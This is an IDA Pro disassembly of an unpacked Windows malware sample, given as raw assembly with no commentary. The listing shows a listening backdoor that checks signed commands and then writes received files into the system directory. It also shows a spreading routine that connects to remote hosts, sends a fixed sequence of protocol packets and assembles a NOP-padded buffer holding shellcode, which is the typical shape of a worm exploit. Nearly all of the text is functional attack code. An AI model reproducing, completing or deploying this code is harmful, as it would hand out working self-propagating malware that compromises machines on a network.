;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 9ABDC66316504EC9DE6291FD62449493
; File Name : u:\work\9abdc66316504ec9de6291fd62449493_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00004000 ( 16384.)
; Section size in file : 00004000 ( 16384.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 401000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_401000 dd 77DD590Bh ; DATA XREF: sub_403380+1E�r
dword_401004 dd 77DD59F0h ; DATA XREF: sub_403380+46�r
dword_401008 dd 77DD23D7h ; DATA XREF: sub_403300+4B�r
dword_40100C dd 77DD22EAh ; DATA XREF: sub_4032C0+16�r
; sub_403300+1F�r
dword_401010 dd 77DD5C55h ; DATA XREF: sub_4032C0+2A�r
dword_401014 dd 77DD189Ah ; DATA XREF: sub_4032C0+35�r
; sub_403300+5A�r ...
dword_401018 dd 77E2A571h ; DATA XREF: UPX0:00402E7D�r
dword_40101C dd 77DE089Eh ; DATA XREF: sub_401210+92�r
dword_401020 dd 77DE07A3h ; DATA XREF: sub_401210+A6�r
dword_401024 dd 77DE0D79h ; DATA XREF: sub_401210+CC�r
dword_401028 dd 77DE0343h ; DATA XREF: sub_401210+E1�r
; sub_401210+10A�r
dword_40102C dd 77DE0AF0h ; DATA XREF: sub_4011F0+7�r
dword_401030 dd 77DE042Eh ; DATA XREF: sub_4011F0+13�r
dword_401034 dd 77DDEBA2h ; DATA XREF: sub_401190+1�r
dword_401038 dd 77DE0BB2h ; DATA XREF: sub_401190+48�r
align 10h
dword_401040 dd 77E79E34h ; DATA XREF: sub_403730+C�r
dword_401044 dd 77E7980Ah ; DATA XREF: sub_403710+E�r
dword_401048 dd 77E76A2Eh ; DATA XREF: sub_403610+84�r
dword_40104C dd 77E6BD13h ; DATA XREF: sub_403530+7A�r
dword_401050 dd 77E684C6h ; DATA XREF: sub_403530+BD�r
dword_401054 dd 77EBB1E7h ; DATA XREF: sub_4037C2�r
dword_401058 dd 77EBA595h ; DATA XREF: sub_4037BC�r
dword_40105C dd 77E616B4h ; DATA XREF: sub_4033F0+60�r
dword_401060 dd 77E706B7h ; DATA XREF: sub_4033F0+6A�r
dword_401064 dd 77EBA6E9h ; DATA XREF: sub_4037B6�r
dword_401068 dd 77E79F93h ; DATA XREF: UPX0:00402D9A�r
dword_40106C dd 77E7C938h ; DATA XREF: UPX0:00402DB7�r
dword_401070 dd 77E73628h ; DATA XREF: UPX0:00402DD3�r
; sub_403530+C�r
dword_401074 dd 77E73167h ; DATA XREF: sub_401170+12�r
; sub_402850+E8�r
dword_401078 dd 77F5157Dh ; DATA XREF: sub_401210:loc_4012E6�r
; sub_401210:loc_4012F7�r ...
dword_40107C dd 77E77C4Ch ; DATA XREF: sub_401210+1E�r
dword_401080 dd 77E61608h ; DATA XREF: sub_401210+E�r
; sub_402490+8�r
dword_401084 dd 77E77963h ; DATA XREF: sub_401350+137�r
; sub_4015F0+76�r ...
dword_401088 dd 77E79D8Ch ; DATA XREF: sub_401350+10C�r
; sub_402710+10B�r
dword_40108C dd 77E7A837h ; DATA XREF: sub_401350+8C�r
; sub_402710+8D�r ...
dword_401090 dd 77E73BEFh ; DATA XREF: sub_401350+72�r
; sub_4016F0+56�r ...
dword_401094 dd 77E705C5h ; DATA XREF: sub_401350+51�r
; sub_401350+186�r
dword_401098 dd 77E704FCh ; DATA XREF: sub_401350+43�r
; sub_401350+17B�r ...
dword_40109C dd 77E73C49h ; DATA XREF: sub_401530+A5�r
; UPX0:00402C53�r ...
dword_4010A0 dd 77E74A3Bh ; DATA XREF: sub_401530+1E�r
dword_4010A4 dd 77E79D5Bh ; DATA XREF: sub_4015F0+EB�r
dword_4010A8 dd 77E7AC37h ; DATA XREF: sub_4015F0+D8�r
; sub_402A80+15�r
dword_4010AC dd 77E737DEh ; DATA XREF: sub_4015F0+70�r
dword_4010B0 dd 77E74672h ; DATA XREF: sub_4016F0+26B�r
; sub_4016F0+292�r ...
dword_4010B4 dd 77E61BE6h ; DATA XREF: sub_4016F0+188�r
; sub_401E20+AA�r ...
dword_4010B8 dd 77E7751Ah ; DATA XREF: sub_4022B0+1F�r
; sub_402850+20�r ...
dword_4010BC dd 77E74155h ; DATA XREF: sub_402500+47�r
; sub_402710+41�r ...
dword_4010C0 dd 77E75CB5h ; DATA XREF: sub_402850+199�r
; UPX0:00402E1D�r ...
dword_4010C4 dd 77E76432h ; DATA XREF: sub_402850+B2�r
dword_4010C8 dd 77E7C2C4h ; DATA XREF: sub_402A70+9�r
dword_4010CC dd 77E61BB8h ; DATA XREF: sub_402AF0+41�r
dword_4010D0 dd 77E777EFh ; DATA XREF: UPX0:00402C3B�r
; sub_403140+9�r
dword_4010D4 dd 77E78B82h ; DATA XREF: sub_402C60+80�r
dword_4010D8 dd 77E793EFh ; DATA XREF: sub_402C60+59�r
dword_4010DC dd 77E7A099h ; DATA XREF: sub_402C60+29�r
; sub_403610+F�r
dd 0
dword_4010E4 dd 77C35280h ; DATA XREF: sub_4037B0�r
dword_4010E8 dd 77C21AD8h ; DATA XREF: sub_40379C�r
dword_4010EC dd 77C43AB0h ; DATA XREF: sub_403796�r
dword_4010F0 dd 77C43500h ; DATA XREF: sub_403790�r
dword_4010F4 dd 77C3528Dh ; DATA XREF: sub_403750�r
dd 0
dword_4010FC dd 77D4C96Ah ; DATA XREF: sub_4016F0+6B�r
; sub_401E20+93�r ...
dd 0
dword_401104 dd 76214750h ; DATA XREF: sub_402710+BA�r
dword_401108 dd 7620BD61h ; DATA XREF: sub_402710+F7�r
dword_40110C dd 7620AFB6h ; DATA XREF: sub_402710+16�r
dword_401110 dd 762211EFh ; DATA XREF: sub_402BF0+8�r
; UPX0:00403214�r
align 8
dword_401118 dd 71AB41DAh ; DATA XREF: UPX0:00402DAC�r
dword_40111C dd 71AB12A7h ; DATA XREF: sub_402EE0+76�r
; ---------------------------------------------------------------------------
locret_401120: ; DATA XREF: sub_402BA0+A�r
retf 0AB32h
; ---------------------------------------------------------------------------
db 71h
dword_401124 dd 71AB1740h ; DATA XREF: sub_402BA0+15�r
dword_401128 dd 71AB12F8h ; DATA XREF: sub_402B60+7�r
dword_40112C dd 71AB2BBFh ; DATA XREF: sub_402B60+1E�r
; sub_402BA0+26�r
dword_401130 dd 71AB1890h ; DATA XREF: sub_4022B0+62�r
dword_401134 dd 71AB401Ch ; DATA XREF: sub_4016F0+4A�r
dword_401138 dd 71AB3E5Dh ; DATA XREF: sub_4016F0+179�r
; sub_401E20+48�r
dword_40113C dd 71AB8629h ; DATA XREF: sub_4016F0+581�r
; UPX0:00402C44�r
dword_401140 dd 71AB3C22h ; DATA XREF: sub_4015F0+E�r
; sub_4016F0+2D�r ...
dword_401144 dd 71AB1746h ; DATA XREF: sub_4015F0+18�r
; sub_4016F0+162�r ...
dword_401148 dd 71AB3ECEh ; DATA XREF: sub_4015F0+1E�r
; sub_402C60+A5�r ...
dword_40114C dd 71AB5DE2h ; DATA XREF: sub_4015F0+64�r
; sub_402C60+FD�r ...
dword_401150 dd 71AB868Dh ; DATA XREF: sub_4015F0+6A�r
; sub_402C60+103�r ...
dword_401154 dd 71AB1A6Dh ; DATA XREF: sub_401530+9D�r
; sub_4016F0+588�r ...
dword_401158 dd 71AB5690h ; DATA XREF: sub_401210+43�r
; sub_401350+F1�r ...
dword_40115C dd 71AB1AF4h ; DATA XREF: sub_401210+120�r
; sub_401350+B4�r ...
dd 4 dup(0)
; =============== S U B R O U T I N E =======================================
sub_401170 proc near ; CODE XREF: sub_401530+37�p
push esi
mov esi, ecx
push offset aCont ; "cont"
lea eax, [esi+4]
mov dword ptr [esi], 0
push eax
call dword_401074 ; lstrcpy
mov eax, esi
pop esi
retn
sub_401170 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401190 proc near ; CODE XREF: sub_401530+40�p
push ebx
mov ebx, dword_401034
push esi
push edi
mov edi, ecx
push 0
push 1
push 0
lea esi, [edi+10h]
push 0
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_4011C3
push 8
push 1
push eax
push eax
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_4011C3
pop edi
pop esi
mov eax, 1
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4011C3: ; CODE XREF: sub_401190+1B�j
; sub_401190+28�j
mov eax, [esi]
add edi, 14h
push edi
push 0
push 0
push 114h
push offset dword_404000
push eax
call dword_401038 ; CryptImportKey
neg eax
sbb eax, eax
pop edi
and al, 0FEh
pop esi
add eax, 2
pop ebx
retn
sub_401190 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4011F0 proc near ; CODE XREF: sub_401530+93�p
push esi
mov esi, ecx
mov eax, [esi+14h]
push eax
call dword_40102C ; CryptDestroyKey
mov ecx, [esi+10h]
push 0
push ecx
call dword_401030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_4011F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401210 proc near ; CODE XREF: sub_401530+4E�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
arg_0 = dword ptr 4
sub esp, 1Ch
lea eax, [esp+1Ch+var_10]
push ebx
push ebp
push esi
push edi
mov ebx, ecx
push eax
call dword_401080 ; GetSystemTime
lea ecx, [esp+2Ch+var_18]
lea edx, [esp+2Ch+var_10]
push ecx
push edx
call dword_40107C ; SystemTimeToFileTime
push 4000h
call sub_403710
mov ebp, [esp+30h+arg_0]
add esp, 4
mov esi, eax
mov eax, [ebp+0]
push 0
push 4000h
push esi
push eax
call dword_401158 ; recv
mov ecx, [esi+8]
mov eax, [esp+2Ch+var_18]
mov edx, [esp+2Ch+var_14]
lea edi, [esi+8]
sub ecx, eax
mov eax, [edi+4]
sbb eax, edx
cmp eax, 8
jg loc_4012F7
jl short loc_401281
cmp ecx, 61C46800h
ja short loc_4012F7
loc_401281: ; CODE XREF: sub_401210+67�j
cmp eax, 0FFFFFFF7h
jl short loc_4012F7
jg short loc_401290
cmp ecx, 9E3B9800h
jb short loc_4012F7
loc_401290: ; CODE XREF: sub_401210+76�j
mov edx, [ebx+10h]
lea ecx, [esp+2Ch+var_1C]
push ecx
push 0
push 0
push 8003h
push edx
call dword_40101C ; CryptCreateHash
test eax, eax
jz short loc_4012E6
mov eax, [esp+2Ch+var_1C]
push 0
push 8
push edi
push eax
call dword_401020 ; CryptHashData
test eax, eax
jz short loc_4012E6
mov eax, [esi+10h]
cmp eax, 2800h
ja short loc_4012E6
mov ecx, [ebx+14h]
push 0
push 0
push ecx
push eax
mov eax, [esp+3Ch+var_1C]
lea edx, [esi+14h]
push edx
push eax
call dword_401024 ; CryptVerifySignatureA
test eax, eax
jnz short loc_401315
loc_4012E6: ; CODE XREF: sub_401210+9A�j
; sub_401210+AE�j ...
call dword_401078 ; RtlGetLastWin32Error
mov ecx, [esp+2Ch+var_1C]
push ecx
call dword_401028 ; CryptDestroyHash
loc_4012F7: ; CODE XREF: sub_401210+61�j
; sub_401210+6F�j ...
call dword_401078 ; RtlGetLastWin32Error
push esi
call sub_403730
add esp, 4
mov eax, 2
pop edi
pop esi
pop ebp
pop ebx
add esp, 1Ch
retn 4
; ---------------------------------------------------------------------------
loc_401315: ; CODE XREF: sub_401210+D4�j
mov edx, [esp+2Ch+var_1C]
push edx
call dword_401028 ; CryptDestroyHash
call sub_403750 ; rand
mov [esi], eax
mov eax, [ebp+0]
push 0
push 4
push esi
push eax
call dword_40115C ; send
push esi
call sub_403730
add esp, 4
xor eax, eax
pop edi
pop esi
pop ebp
pop ebx
add esp, 1Ch
retn 4
sub_401210 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401350 proc near ; CODE XREF: sub_401530+7C�p
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_108 = byte ptr -108h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
sub esp, 224h
cmp eax, 8
push ebx
push esi
push edi
jge short loc_401372
push 0
push eax
mov eax, [esp+238h+arg_4]
push eax
jmp loc_401512
; ---------------------------------------------------------------------------
loc_401372: ; CODE XREF: sub_401350+10�j
mov edi, [esp+230h+arg_4]
mov eax, [edi]
lea ebx, [edi+8]
test eax, eax
jnz loc_4014BC
lea edx, [esp+230h+var_108]
push 104h
push edx
call dword_401098 ; GetSystemDirectoryA
lea eax, [esp+230h+var_108]
push eax
call dword_401094 ; SetCurrentDirectoryA
mov ecx, [ebx]
mov esi, [ebx+4]
lea edx, [ebx+8]
push 104h
lea eax, [esp+234h+var_210]
push edx
push eax
mov [esp+23Ch+var_224], ecx
mov [esp+23Ch+var_218], esi
call dword_401090 ; lstrcpyn
push 0
push 0
push 2
push 0
push 0
lea ecx, [esp+244h+var_210]
push 40000000h
push ecx
call dword_40108C ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [esp+230h+var_21C], eax
jz loc_401498
push ebp
mov ebp, [esp+234h+arg_0]
push 0
push 8
push edi
push ebp
mov dword ptr [edi+4], 1
call dword_40115C ; send
mov ecx, [esp+230h+var_220]
xor edx, edx
mov eax, ecx
div esi
xor edx, edx
mov [esp+230h+var_21C], eax
mov eax, ecx
div esi
test edx, edx
jz short loc_401426
inc [esp+230h+var_21C]
loc_401426: ; CODE XREF: sub_401350+D0�j
mov eax, [esp+230h+var_21C]
mov [esp+230h+var_220], 0
test eax, eax
jle short loc_401482
jmp short loc_40143C
; ---------------------------------------------------------------------------
loc_401438: ; CODE XREF: sub_401350+130�j
mov esi, [esp+230h+var_214]
loc_40143C: ; CODE XREF: sub_401350+E6�j
push 0
push esi
push ebx
push ebp
call dword_401158 ; recv
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_401482
mov eax, [esp+230h+var_218]
lea edx, [esp+230h+var_210]
push 0
push edx
push esi
push ebx
push eax
call dword_401088 ; WriteFile
push 0
push 8
push edi
push ebp
mov [edi+4], esi
call dword_40115C ; send
mov eax, [esp+230h+var_220]
mov ecx, [esp+230h+var_21C]
inc eax
cmp eax, ecx
mov [esp+230h+var_220], eax
jl short loc_401438
loc_401482: ; CODE XREF: sub_401350+E4�j
; sub_401350+FC�j
mov ecx, [esp+230h+var_218]
push ecx
call dword_401084 ; CloseHandle
pop ebp
pop edi
pop esi
pop ebx
loc_401491: ; DATA XREF: UPX0:off_404808�o
add esp, 224h
retn
; ---------------------------------------------------------------------------
loc_401498: ; CODE XREF: sub_401350+99�j
mov edx, [esp+230h+arg_0]
push 0
push 8
push edi
push edx
mov dword ptr [edi+4], 0
call dword_40115C ; send
pop edi
pop esi
pop ebx
add esp, 224h
retn
; ---------------------------------------------------------------------------
loc_4014BC: ; CODE XREF: sub_401350+30�j
cmp eax, 1
jnz short loc_4014F9
lea eax, [esp+230h+var_210]
push 104h
push eax
call dword_401098 ; GetSystemDirectoryA
lea ecx, [esp+230h+var_210]
push ecx
call dword_401094 ; SetCurrentDirectoryA
mov edx, [esp+230h+arg_0]
push 0
push 4
push edi
push edx
call dword_40115C ; send
pop edi
pop esi
pop ebx
add esp, 224h
retn
; ---------------------------------------------------------------------------
loc_4014F9: ; CODE XREF: sub_401350+16F�j
cmp eax, 3
jnz short loc_401520
mov eax, [ebx]
add ebx, 4
push eax
push ebx
call sub_402AF0
add esp, 8
push 0
push 4
push edi
loc_401512: ; CODE XREF: sub_401350+1D�j
mov ecx, [esp+23Ch+arg_0]
push ecx
call dword_40115C ; send
loc_401520: ; CODE XREF: sub_401350+1AC�j
pop edi
pop esi
pop ebx
add esp, 224h
retn
sub_401350 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401530 proc near ; DATA XREF: sub_4015F0+CF�o
var_30 = dword ptr -30h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
arg_0 = dword ptr 4
sub esp, 30h
push esi
push edi
call sub_402A30
mov esi, [esp+38h+arg_0]
mov ecx, 6
lea edi, [esp+38h+var_30]
rep movsd
mov eax, [esp+38h+var_1C]
push eax
call dword_4010A0 ; SetEvent
push 10000h
call sub_403710
add esp, 4
lea ecx, [esp+38h+var_18]
mov esi, eax
call sub_401170
lea ecx, [esp+38h+var_18]
call sub_401190
lea ecx, [esp+38h+var_30]
push ecx
lea ecx, [esp+3Ch+var_18]
call sub_401210
test eax, eax
jnz short loc_4015B6
mov edi, dword_401158
loc_40158D: ; CODE XREF: sub_401530+84�j
mov edx, [esp+38h+var_30]
push 0
push 10000h
push esi
push edx
call edi ; recv
cmp eax, 0FFFFFFFFh
jz short loc_4015B6
test eax, eax
jz short loc_4015B6
push eax
mov eax, [esp+3Ch+var_30]
push esi
push eax
call sub_401350
add esp, 0Ch
jmp short loc_40158D
; ---------------------------------------------------------------------------
loc_4015B6: ; CODE XREF: sub_401530+55�j
; sub_401530+6F�j ...
push esi
call sub_403730
add esp, 4
lea ecx, [esp+38h+var_18]
call sub_4011F0
mov ecx, [esp+38h+var_30]
push ecx
call dword_401154 ; closesocket
push 0
call dword_40109C ; ExitThread
pop edi
xor eax, eax
pop esi
add esp, 30h
retn 4
sub_401530 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4015F0 proc near ; DATA XREF: UPX0:00402E67�o
var_40 = dword ptr -40h
var_3C = byte ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 40h
push ebx
push ebp
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_401140 ; socket
mov edi, eax
xor eax, eax
mov ebx, dword_401144
mov ebp, dword_401148
mov [esp+50h+var_38], eax
mov word ptr [esp+50h+var_38], 2
mov [esp+50h+var_34], eax
mov [esp+50h+var_34], esi
mov [esp+50h+var_30], eax
mov [esp+50h+var_2C], eax
loc_40162F: ; CODE XREF: sub_4015F0+5F�j
lea ecx, [esi+0BFBh]
push ecx
call ebx ; htons
lea edx, [esp+50h+var_38]
push 10h
push edx
push edi
mov word ptr [esp+5Ch+var_38+2], ax
call ebp ; bind
test eax, eax
jz short loc_401651
inc esi
cmp esi, 0Ah
jl short loc_40162F
loc_401651: ; CODE XREF: sub_4015F0+59�j
push 32h
push edi
call dword_40114C ; listen
mov ebx, dword_401150
mov ebp, dword_4010AC
mov esi, dword_401084
loc_40166C: ; CODE XREF: sub_4015F0+F8�j
lea eax, [esp+50h+var_40]
lea ecx, [esp+50h+var_28]
push eax
push ecx
push edi
mov [esp+5Ch+var_40], 10h
call ebx ; accept
push 0
push 0
mov edx, [esp+58h+var_28]
mov ecx, [esp+58h+var_20]
mov [esp+58h+var_18], eax
mov eax, [esp+58h+var_24]
mov [esp+58h+var_14], edx
mov edx, [esp+58h+var_1C]
push 1
push 0
mov [esp+60h+var_10], eax
mov [esp+60h+var_C], ecx
mov [esp+60h+var_8], edx
call ebp ; CreateEventA
lea ecx, [esp+50h+var_18]
mov [esp+50h+var_4], eax
lea eax, [esp+50h+var_3C]
push eax
push 0
push ecx
push offset sub_401530
push 0
push 0
call dword_4010A8 ; CreateThread
push eax
call esi ; CloseHandle
push 3E8h
mov edx, [esp+54h+var_4]
push edx
call dword_4010A4 ; WaitForSingleObject
mov eax, [esp+50h+var_4]
push eax
call esi ; CloseHandle
jmp short loc_40166C
sub_4015F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4016F0 proc near ; CODE XREF: sub_4030E0+2B�p
; sub_403140+57�p
var_128 = dword ptr -128h
var_11C = dword ptr -11Ch
var_10C = dword ptr -10Ch
var_A2 = byte ptr -0A2h
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_38 = byte ptr -38h
var_1A = byte ptr -1Ah
var_C = byte ptr -0Ch
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_2C = byte ptr 30h
arg_30 = byte ptr 34h
arg_38 = byte ptr 3Ch
arg_4C = byte ptr 50h
arg_4F = byte ptr 53h
arg_54 = byte ptr 58h
arg_78 = byte ptr 7Ch
arg_79 = byte ptr 7Dh
arg_7B = byte ptr 7Fh
arg_7C = byte ptr 80h
arg_A4 = byte ptr 0A8h
arg_C4 = byte ptr 0C8h
arg_C5 = byte ptr 0C9h
arg_C8 = byte ptr 0CCh
arg_D8 = byte ptr 0DCh
arg_EC = byte ptr 0F0h
arg_660 = byte ptr 664h
arg_6D4 = byte ptr 6D8h
arg_770 = byte ptr 774h
arg_E78 = dword ptr 0E7Ch
arg_E88 = byte ptr 0E8Ch
arg_EB8 = dword ptr 0EBCh
arg_EC8 = byte ptr 0ECCh
arg_11EC = dword ptr 11F0h
arg_11F0 = dword ptr 11F4h
arg_11FC = byte ptr 1200h
arg_1410 = byte ptr 1414h
arg_148C = byte ptr 1490h
arg_1504 = byte ptr 1508h
arg_1C5C = byte ptr 1C60h
arg_2107 = byte ptr 210Bh
arg_23D0 = byte ptr 23D4h
arg_23F4 = byte ptr 23F8h
arg_2464 = byte ptr 2468h
arg_2468 = byte ptr 246Ch
arg_2F28 = byte ptr 2F2Ch
arg_44CC = byte ptr 44D0h
arg_4541 = byte ptr 4545h
arg_5560 = byte ptr 5564h
arg_6028 = byte ptr 602Ch
arg_6090 = byte ptr 6094h
arg_6098 = byte ptr 609Ch
arg_6099 = byte ptr 609Dh
arg_609C = byte ptr 60A0h
arg_8208 = dword ptr 820Ch
mov eax, 8214h
call sub_403760
mov eax, dword_404B0C
mov ecx, dword_404B10
push ebp
push esi
mov esi, 1
push 0
push esi
push 2
mov [esp+14h+arg_8], eax
mov [esp+14h+arg_C], ecx
mov [esp+14h+arg_4], esi
call dword_401140 ; socket
mov ebp, eax
cmp ebp, 0FFFFFFFFh
jz loc_401C8D
push ebx
mov ebx, [esp+18h+arg_8208]
push edi
push 1Dh
push ebx
call dword_401134 ; inet_ntoa
lea edx, [esp+24h+arg_38]
push eax
push edx
call dword_401090 ; lstrcpyn
lea eax, [esp+2Ch+arg_2C]
lea ecx, [esp+2Ch+arg_4]
push eax
push offset dword_404B00
push ecx
call dword_4010FC ; wsprintfA
add esp, 0Ch
xor eax, eax
lea ecx, [esp+2Ch+arg_C5]
loc_40176D: ; CODE XREF: sub_4016F0+8E�j
mov dl, byte ptr [esp+eax+2Ch+arg_4]
inc eax
mov [ecx-1], dl
mov byte ptr [ecx], 0
add ecx, 2
cmp eax, 28h
jl short loc_40176D
mov ecx, 18h
mov esi, offset dword_404614
lea edi, [esp+2Ch+arg_4C]
xor eax, eax
rep movsd
or ecx, 0FFFFFFFFh
lea edi, [esp+2Ch+arg_4]
repne scasb
not ecx
dec ecx
lea esi, [esp+2Ch+arg_C4]
shl ecx, 1
mov eax, ecx
lea edi, [esp+2Ch+arg_7C]
shr ecx, 2
rep movsd
mov ecx, eax
xor eax, eax
and ecx, 3
mov edx, dword_40466B
rep movsb
lea edi, [esp+2Ch+arg_4]
or ecx, 0FFFFFFFFh
repne scasb
not ecx
mov eax, dword_40466F
dec ecx
lea edi, [esp+2Ch+arg_4]
push 1BDh
lea ecx, [esp+ecx*2+30h+arg_7B]
mov [ecx], edx
mov dl, byte_404673
mov [ecx+4], eax
xor eax, eax
mov [ecx+8], dl
or ecx, 0FFFFFFFFh
repne scasb
not ecx
dec ecx
lea edi, [esp+30h+arg_4]
add cl, 1Ah
shl cl, 1
mov [esp+17h], cl
mov [esp+30h+arg_4F], cl
or ecx, 0FFFFFFFFh
repne scasb
not ecx
dec ecx
mov eax, 31313131h
shl cl, 1
add cl, 9
lea edi, [esp+30h+arg_1504]
mov [esp+30h+arg_79], cl
mov ecx, 38Ah
rep stosd
stosb
xor eax, eax
mov [esp+30h+var_8], eax
mov word ptr [esp+30h+var_8], 2
mov [esp+30h+var_4], eax
mov [esp+30h], eax
mov [esp+30h+arg_0], eax
call dword_401144 ; htons
lea ecx, [esp+30h+var_C]
push 10h
push ecx
push ebp
mov [esp+3Ch+var_A], ax
mov [esp+3Ch+var_8], ebx
call dword_401138 ; connect
cmp eax, 0FFFFFFFFh
jz loc_401C77
mov ebx, dword_4010B4
push 0C8h
call ebx ; Sleep
mov esi, dword_40115C
push 0
push 89h
push offset dword_4043FC
push ebp
call esi ; send
push 0C8h
call ebx ; Sleep
mov edi, dword_401158
push 0
lea edx, [esp+58h+arg_EC]
push 640h
push edx
push ebp
call edi ; recv
cmp eax, 0FFFFFFFFh
jz loc_401C6E
push 0
push 0A8h
push offset dword_404488
push ebp
call esi ; send
push 0C8h
call ebx ; Sleep
push 0
lea eax, [esp+7Ch+arg_C8]
push 640h
push eax
push ebp
call edi ; recv
cmp eax, 0FFFFFFFFh
jz loc_401C6E
push 0
push 0DEh
push offset dword_404534
push ebp
call esi ; send
push 0C8h
call ebx ; Sleep
push 0
lea ecx, [esp+0A0h+arg_A4]
push 640h
push ecx
push ebp
call edi ; recv
cmp eax, 0FFFFFFFFh
jz loc_401C6E
cmp eax, 46h
jl loc_401C6E
cmp [esp+0ACh+arg_D8], 31h
jnz loc_401B1A
mov ecx, 1F4h
mov eax, 90909090h
lea edi, [esp+0ACh+arg_6D4]
push offset loc_404120
rep stosd
mov [esp+0B0h+var_98], 0
call dword_4010B0 ; lstrlen
mov ecx, eax
mov esi, offset loc_404120
mov edx, ecx
lea edi, [esp+0B0h+arg_770]
shr ecx, 2
rep movsd
mov ecx, edx
lea eax, [esp+0B0h+var_94]
and ecx, 3
push eax
rep movsb
call dword_4010B0 ; lstrlen
mov ecx, eax
lea esi, [esp+0B4h+var_98]
mov edx, ecx
lea edi, [esp+0B4h+arg_E88]
shr ecx, 2
rep movsd
mov eax, dword_404A40
mov ecx, edx
and ecx, 3
rep movsb
mov [esp+0B4h+arg_E78], eax
loc_4019AF: ; CODE XREF: sub_4016F0+511�j
movsx ecx, byte ptr [esp+13h]
mov esi, dword_40115C
add ecx, 4
push 0
lea edx, [esp+0B8h+var_38]
push ecx
push edx
push ebp
call esi ; send
push 0C8h
call ebx ; Sleep
mov edi, dword_401158
push 0
lea eax, [esp+0CCh+arg_78]
push 640h
push eax
push ebp
call edi ; recv
cmp eax, 0FFFFFFFFh
jz loc_401C6E
push 0
push 68h
push offset dword_404678
push ebp
call esi ; send
push 0C8h
call ebx ; Sleep
push 0
lea ecx, [esp+0F0h+arg_54]
push 640h
push ecx
push ebp
call edi ; recv
cmp eax, 0FFFFFFFFh
jz loc_401C6E
push 0
push 0A0h
push offset dword_4046E4
push ebp
call esi ; send
push 0C8h
call ebx ; Sleep
push 0
lea edx, [esp+114h+arg_30]
push 640h
push edx
push ebp
call edi ; recv
cmp eax, 0FFFFFFFFh
jz loc_401C6E
mov eax, [esp+120h+var_10C]
test eax, eax
jz loc_401C06
mov ecx, 1Ah
mov esi, offset dword_40489C
lea edi, [esp+120h+arg_6028]
push 0
rep movsd
mov ecx, 6D6h
lea esi, [esp+124h+arg_44CC]
lea edi, [esp+124h+arg_6090]
lea eax, [esp+124h+arg_6028]
rep movsd
movsw
mov ecx, 1Ch
mov esi, offset dword_404908
lea edi, [esp+124h+arg_23F4]
push 10FCh
rep movsd
mov ecx, 297h
lea esi, [esp+128h+arg_5560]
lea edi, [esp+128h+arg_2464]
push eax
rep movsd
movsw
mov ecx, 21h
mov esi, offset dword_40497C
lea edi, [esp+12Ch+arg_2F28]
push ebp
rep movsd
mov esi, dword_40115C
call esi ; send
push 0C8h
call ebx ; Sleep
push 0
lea ecx, [esp+138h+arg_C]
push 640h
push ecx
push ebp
call dword_401158 ; recv
cmp eax, 0FFFFFFFFh
jz loc_401C6E
push 0
lea edx, [esp+148h+arg_23D0]
push 0FDCh
push edx
push ebp
call esi ; send
jmp loc_401C5F
; ---------------------------------------------------------------------------
loc_401B1A: ; CODE XREF: sub_4016F0+245�j
mov ecx, 36Bh
mov eax, 90909090h
lea edi, [esp+0ACh+arg_6D4]
mov edx, dword_404A7C
rep stosd
mov edi, offset loc_404120
or ecx, 0FFFFFFFFh
xor eax, eax
mov esi, offset loc_404120
repne scasb
not ecx
dec ecx
lea edi, [esp+0ACh+arg_EC8]
mov eax, ecx
mov [esp+0ACh+arg_EB8], edx
shr ecx, 2
rep movsd
mov ecx, eax
